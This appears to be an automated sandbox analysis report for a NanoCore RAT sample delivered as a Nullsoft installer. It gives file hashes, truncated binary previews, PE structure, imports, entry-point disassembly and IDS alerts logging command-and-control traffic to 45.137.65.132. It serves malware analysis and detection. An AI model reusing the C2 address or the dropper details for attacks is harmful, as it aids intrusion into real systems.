                    Size (bytes):406476
                    Entropy (8bit):7.760217782520545
                    Encrypted:false
                    SSDEEP:12288:DfIs4bcdUHKgcuzRlCDlNXhJGjvwDjpzxTSmFTo:DfIhcdUD1lC7hJGs5xTjBo
                    MD5:306A577A34A568DC94A31C8EB371E05A
                    SHA1:5EA8978456D1F1198C9C806F9435DA09EA943555
                    SHA-256:50F3AC3A1EBC8EC50D101E815DDB00A1DE7284D85C5502E7569C3BC7BCF91F25
                    SHA-512:0E9A2A2228694DC61F206BD8897C645FF8E76B635ECC22AF5262C2196E13D32CBDEDFF6BDF26637BD3BF8D387C6556A78781828E4390B2C29973040B17A376BA
                    Malicious:false
                    Reputation:low
                    Preview:&6......,...................y...0'......@5.......6..........................................................................................................................................................................................................................................G...................j...........................................................................................................................................9...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\fyTwP4SHWF.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:modified
                    Size (bytes):76800
                    Entropy (8bit):6.349678040473841
                    Encrypted:false
                    SSDEEP:1536:v/9cI7eE+7q3xJ6qI8ZZ9kmQFo4EFFWD3gjn5LIPU4l3:v/9cIWcxTZ3km34EFkOX4l3
                    MD5:C1DC97853E14C21B463C6E95B21C300C
                    SHA1:78ADBB8A1EFCB4F0AB5BEBA8A3CF70E5074BE945
                    SHA-256:F18C6867F028E0E31A939FDB580762F57DCD11BB25B11E632EE22F21203DCC31
                    SHA-512:04DFC132DBC5D31EBEA2E8453F065E2FCB67224F60A0EB0F53C27CBA6A36208A915E14B8E877F92C5FBA5C583580EBF759BFC650D7B95A526E4703A71F700A2B
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 10%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Oe8%..Vv..Vv..Vvdr.v+.Vvdr.v..Vv.|.v..Vv..Wv..Vvdr.v|.Vvdr.v..VvRich..Vv........................PE..L......c.....................v.......3............@..........................................................................#.......................................................................................................................text...J........................... ..`.rdata...1.......2..................@..@.data....B...@......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\fyTwP4SHWF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):7840
                    Entropy (8bit):7.191226445255042
                    Encrypted:false
                    SSDEEP:192:darcitQvArWiPvECb9l5E3JHuQOoLHqGDcfumovUX7fN+:uCYrNPvEEzOjnKRmdsLN+
                    MD5:E3C9D191E461DB735E4FDF1AC0FD72A5
                    SHA1:0E8F30B10F46933786D4525F59D4ABEA09D519FC
                    SHA-256:20838738B10F16E37211678286DBE6E5561E0057770344D5C9BF9F6865FC217D
                    SHA-512:C04EE58FFC5ACCEFBE16F5F36281348E1D536E8E47105CF7A70D67FE93ED4A517FE164F960EFFF45A43EE40D5453A63D176E8FE44928D12AD469A0C043A935A2
                    Malicious:false
                    Preview:.705m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e....aboZf`Z\V.v...`ZYaZCV.v.j^YV.}.lZAU.w.`Z\^.q.iY.T.}.m^.q.[WlT.}....i.W.y.R.}.^.y.W.q.......XW..Mc.....\7!.K.y.a..`.....Z...Jo.......\GB.Gg.u......X.B.Kg.v......Pp..Nd.w.....\...Ke.}.....Y...Ko.p......G8.u....0<..480fP.401Y7a^?X580..D;.g.....A4...Tgn.`...G.X0P0.80..3cg.a.p0..D.`...igen.a..@.b.e.kX.013^3gR7]804p.F8.a.c..q.ad.G<n.`..D2..qb.e...knj..o.00`...)ecXg`Z]^.q.iYXk^OV.}.lZPU.w.`ZE^.q.iY]T.}.mR.R.t.lT.}._\hR.t...R.}.^.y.W.y.R.u......ZR..Jo....\5$.O
                    Process:C:\Users\user\Desktop\fyTwP4SHWF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):307958
                    Entropy (8bit):7.98837190566036
                    Encrypted:false
                    SSDEEP:6144:hApS0PxPJG0RbcXNuGiHKgagwuzHEElCDlN5yObFhM4Gj0cwzRFE:hfIs4bcdUHKgcuzRlCDlNXhJGjvwDE
                    MD5:FC0382D6DBF66C328188C64CACD86ED6
                    SHA1:F7AF5088065FD1F9B66D8F4EE4041E3B8430CC33
                    SHA-256:60C585E63B9378D1ED35E059B6BC6CC362129A4BFD40F70B0037724C1540AA54
                    SHA-512:300D0BB1FBA8E4CE455C9B0AF121A247FA94A3DDE5D37339FC6CCA1DCB52D568C6EAD0CEA6484A26C574AE03059ADCF2FF24BC4C114ADF54EE10DA1874664B2A
                    Malicious:false
                    Preview:Cs...w.W7.3.=Q.....4....L".O..$J{..{..........#..+.E..4...Y...6.).P.8...^.....Y..M..m.v.4AI..*.p.8..i.M5.Z-u..q..".G.>..wq...D...v.!W.bX..+..f.......>#uRS>.~3.$Oty.}.WeL.].t..o...Y.F.S.F..G..k...g...."...S..S....$.........4h.....h.."...'.C.q..i.w..:.3....1...4....L".O.0.q.r.............>#..1.E..4..~.@.X).7u..|1....]..k.....p..A.z.1.KAu...y{aS4.P....M.U.G.T>..R..e.]ho.[....{.7.N..PMY}_.s.....U@......d>.8...>5o....e..lh.V.v.%...'..Os....?./..s.?.=.b4.KLc<..........n."QX.Cn."...'.C..../.w...3ZxQ..].......L".O..$J{.C{..Sj.g.R..{.#....E.4...Y....X)i7u..|1......$`.....E.....zU1.!..`..y{wS4.P.K.MP..B.>....e.\.h.*....r{...N+..MY}_.B..q..U@......d>.8..a..5y....e..lh.V.v.%...'..Os....Du|..s.?.=.b4.KLcg..........n."QX.Cn."...'.C.q..i.w..7.3Z`Q.....4....L".O..$J{..{..........#..+.E..4..~Y....X)i7u..|1.....]..k........A.z.1.!Au`..y{wS4.P...M.U.G.>..R..e.]h.2....{...N+..MY}_.s.....U@......d>.8..a..5y....e..lh.V.v.%...'..Os....Du|..s.?.=.b4.KLcg.....
                    Process:C:\Users\user\AppData\Local\Temp\rnixgfly.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):232
                    Entropy (8bit):7.024371743172393
                    Encrypted:false
                    SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                    MD5:32D0AAE13696FF7F8AF33B2D22451028
                    SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                    SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                    SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                    Malicious:false
                    Preview:Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                    Process:C:\Users\user\AppData\Local\Temp\rnixgfly.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8
                    Entropy (8bit):3.0
                    Encrypted:false
                    SSDEEP:3:1:1
                    MD5:CBBA5F74CCE62678ECC52D978F037A9F
                    SHA1:3E39F355F2478AF39A83DC12068D7CC036474234
                    SHA-256:D06D749AA9BC3D4B78BC0FDFA28C3FD74A87EEFD94A59362437FC1FE68184B9E
                    SHA-512:1E380CE236852AC82606848C60D3B3DC8D2859DBC476C7692B983102BF8AF8B93D87D58B7DA1C81937ABDBB51DAC567DB192CCCA6BC852C6A4D2628FD3B31500
                    Malicious:true
                    Preview:..=8V..H
                    Process:C:\Users\user\AppData\Local\Temp\rnixgfly.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):40
                    Entropy (8bit):5.221928094887364
                    Encrypted:false
                    SSDEEP:3:9bzY6oRDMjmPl:RzWDMCd
                    MD5:AE0F5E6CE7122AF264EC533C6B15A27B
                    SHA1:1265A495C42EED76CC043D50C60C23297E76CCE1
                    SHA-256:73B0B92179C61C26589B47E9732CE418B07EDEE3860EE5A2A5FB06F3B8AA9B26
                    SHA-512:DD44C2D24D4E3A0F0B988AD3D04683B5CB128298043134649BBE33B2512CE0C9B1A8E7D893B9F66FBBCDD901E2B0646C4533FB6C0C8C4AFCB95A0EFB95D446F8
                    Malicious:false
                    Preview:9iH...}Z.4..f..... 8.j....|.&X..e.F.*.
                    Process:C:\Users\user\AppData\Local\Temp\rnixgfly.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):327432
                    Entropy (8bit):7.99938831605763
                    Encrypted:true
                    SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                    MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                    SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                    SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                    SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                    Malicious:false
                    Preview:pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                    Process:C:\Users\user\AppData\Local\Temp\rnixgfly.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):76800
                    Entropy (8bit):6.349678040473841
                    Encrypted:false
                    SSDEEP:1536:v/9cI7eE+7q3xJ6qI8ZZ9kmQFo4EFFWD3gjn5LIPU4l3:v/9cIWcxTZ3km34EFkOX4l3
                    MD5:C1DC97853E14C21B463C6E95B21C300C
                    SHA1:78ADBB8A1EFCB4F0AB5BEBA8A3CF70E5074BE945
                    SHA-256:F18C6867F028E0E31A939FDB580762F57DCD11BB25B11E632EE22F21203DCC31
                    SHA-512:04DFC132DBC5D31EBEA2E8453F065E2FCB67224F60A0EB0F53C27CBA6A36208A915E14B8E877F92C5FBA5C583580EBF759BFC650D7B95A526E4703A71F700A2B
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 10%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Oe8%..Vv..Vv..Vvdr.v+.Vvdr.v..Vv.|.v..Vv..Wv..Vvdr.v|.Vvdr.v..VvRich..Vv........................PE..L......c.....................v.......3............@..........................................................................#.......................................................................................................................text...J........................... ..`.rdata...1.......2..................@..@.data....B...@......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.687199505367895
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:fyTwP4SHWF.exe
                    File size:430029
                    MD5:d3e933b0aab571bdc73355a106d657e0
                    SHA1:ee600eacf16a1075fc8a28116a64f96403122d49
                    SHA256:51ab5d042dee8df90162a00a3307cf8d38d12bc54b7dc07c756996aa0f6b3804
                    SHA512:db4cf8c673e8fa839ad9af7edd61f00d57d24ba68955e97e4acc2f0a3046c4aa91a63c2a0c3803de3276b6cb7ba1f27f66732e2a023c0d0f484f4b457fc9f42c
                    SSDEEP:6144:nYa603Pc/eEb9Ih4VB/Q3Eo1z/AMxf09Vi01XpSjROKeOSA3yPKN5nCugfzs0GFD:nYi0GEb9Z87jf+1wdPNiOh7gfzsh1
                    TLSH:45940288F8548973EDAA0833FEAAD8055726BD126E650D4972D4BB5B3EB3483C30D753
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                    Icon Hash:707070f0c8c8e170
                    Entrypoint:0x403640
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:61259b55b8912888e90f516ca08dc514
                    Instruction
                    push ebp
                    mov ebp, esp
                    sub esp, 000003F4h
                    push ebx
                    push esi
                    push edi
                    push 00000020h
                    pop edi
                    xor ebx, ebx
                    push 00008001h
                    mov dword ptr [ebp-14h], ebx
                    mov dword ptr [ebp-04h], 0040A230h
                    mov dword ptr [ebp-10h], ebx
                    call dword ptr [004080C8h]
                    mov esi, dword ptr [004080CCh]
                    lea eax, dword ptr [ebp-00000140h]
                    push eax
                    mov dword ptr [ebp-0000012Ch], ebx
                    mov dword ptr [ebp-2Ch], ebx
                    mov dword ptr [ebp-28h], ebx
                    mov dword ptr [ebp-00000140h], 0000011Ch
                    call esi
                    test eax, eax
                    jne 00007F96B93C630Ah
                    lea eax, dword ptr [ebp-00000140h]
                    mov dword ptr [ebp-00000140h], 00000114h
                    push eax
                    call esi
                    mov ax, word ptr [ebp-0000012Ch]
                    mov ecx, dword ptr [ebp-00000112h]
                    sub ax, 00000053h
                    add ecx, FFFFFFD0h
                    neg ax
                    sbb eax, eax
                    mov byte ptr [ebp-26h], 00000004h
                    not eax
                    and eax, ecx
                    mov word ptr [ebp-2Ch], ax
                    cmp dword ptr [ebp-0000013Ch], 0Ah
                    jnc 00007F96B93C62DAh
                    and word ptr [ebp-00000132h], 0000h
                    mov eax, dword ptr [ebp-00000134h]
                    movzx ecx, byte ptr [ebp-00000138h]
                    mov dword ptr [0042A318h], eax
                    xor eax, eax
                    mov ah, byte ptr [ebp-0000013Ch]
                    movzx eax, ax
                    or eax, ecx
                    xor ecx, ecx
                    mov ch, byte ptr [ebp-2Ch]
                    movzx ecx, cx
                    shl eax, 10h
                    or eax, ecx
                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x116c8.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x3b0000x116c80x11800False0.34814453125data5.080230239740608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x3b2080x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States
                    RT_ICON0x4ba300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                    RT_DIALOG0x4be980x100dataEnglishUnited States
                    RT_DIALOG0x4bf980x11cdataEnglishUnited States
                    RT_DIALOG0x4c0b80x60dataEnglishUnited States
                    RT_GROUP_ICON0x4c1180x22dataEnglishUnited States
                    RT_VERSION0x4c1400x244dataEnglishUnited States
                    RT_MANIFEST0x4c3880x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                    DLLImport
                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    192.168.2.745.137.65.1324973462692816766 02/01/23-05:15:28.676401TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497346269192.168.2.745.137.65.132
                    45.137.65.132192.168.2.76269497272841753 02/01/23-05:14:56.574585TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694972745.137.65.132192.168.2.7
                    45.137.65.132192.168.2.76269497442841753 02/01/23-05:16:22.394490TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694974445.137.65.132192.168.2.7
                    192.168.2.745.137.65.1324972862692816766 02/01/23-05:15:03.576741TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497286269192.168.2.745.137.65.132
                    192.168.2.745.137.65.1324971162692816766 02/01/23-05:14:19.296579TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497116269192.168.2.745.137.65.132
                    45.137.65.132192.168.2.76269497402810451 02/01/23-05:15:57.113635TCP2810451ETPRO TROJAN NanoCore RAT Keepalive Response 362694974045.137.65.132192.168.2.7
                    45.137.65.132192.168.2.76269497222841753 02/01/23-05:14:40.350682TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694972245.137.65.132192.168.2.7
                    192.168.2.745.137.65.1324972062692816766 02/01/23-05:14:35.257700TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497206269192.168.2.745.137.65.132
                    45.137.65.132192.168.2.76269497402841753 02/01/23-05:15:57.113635TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694974045.137.65.132192.168.2.7
                    192.168.2.745.137.65.1324973062692816766 02/01/23-05:15:09.580115TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497306269192.168.2.745.137.65.132
                    192.168.2.745.137.65.1324973362692816766 02/01/23-05:15:22.661130TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497336269192.168.2.745.137.65.132
                    45.137.65.132192.168.2.76269497232841753 02/01/23-05:14:46.707897TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694972345.137.65.132192.168.2.7
                    45.137.65.132192.168.2.76269497242841753 02/01/23-05:14:51.698320TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694972445.137.65.132192.168.2.7
                    45.137.65.132192.168.2.76269497412841753 02/01/23-05:16:02.171075TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694974145.137.65.132192.168.2.7
                    45.137.65.132192.168.2.76269497432841753 02/01/23-05:16:07.296877TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694974345.137.65.132192.168.2.7
                    45.137.65.132192.168.2.76269497142810290 02/01/23-05:14:28.429351TCP2810290ETPRO TROJAN NanoCore RAT Keepalive Response 162694971445.137.65.132192.168.2.7
                    192.168.2.745.137.65.1324973762692816766 02/01/23-05:15:41.799633TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497376269192.168.2.745.137.65.132
                    192.168.2.745.137.65.1324974162692816766 02/01/23-05:16:02.177770TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497416269192.168.2.745.137.65.132
                    45.137.65.132192.168.2.76269497392841753 02/01/23-05:15:52.038941TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694973945.137.65.132192.168.2.7
                    192.168.2.745.137.65.1324971462692816766 02/01/23-05:14:29.178500TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497146269192.168.2.745.137.65.132
                    45.137.65.132192.168.2.76269497312841753 02/01/23-05:15:14.788888TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694973145.137.65.132192.168.2.7
                    45.137.65.132192.168.2.76269497352841753 02/01/23-05:15:33.801145TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694973545.137.65.132192.168.2.7
                    45.137.65.132192.168.2.76269497382841753 02/01/23-05:15:46.943033TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)62694973845.137.65.132192.168.2.7
                    TimestampSource PortDest PortSource IPDest IP
                    Feb 1, 2023 05:14:18.162858009 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.197880030 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.198355913 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.241461992 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.290383101 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.308535099 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.337692976 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.337827921 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.424077034 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.441468000 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.533484936 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.557157993 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.557209015 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.557250023 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.557296038 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.557595968 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.557595968 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.587589979 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.587625027 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.587646008 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.587665081 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.587683916 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.587702036 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.587721109 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.587738991 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.587958097 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.589979887 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.589979887 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.618155003 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.618196011 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.618218899 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.618242979 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.618268013 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.618294001 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.618407965 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.618407965 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.620224953 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.620249987 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.620271921 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.620296001 CET62694971145.137.65.132192.168.2.7
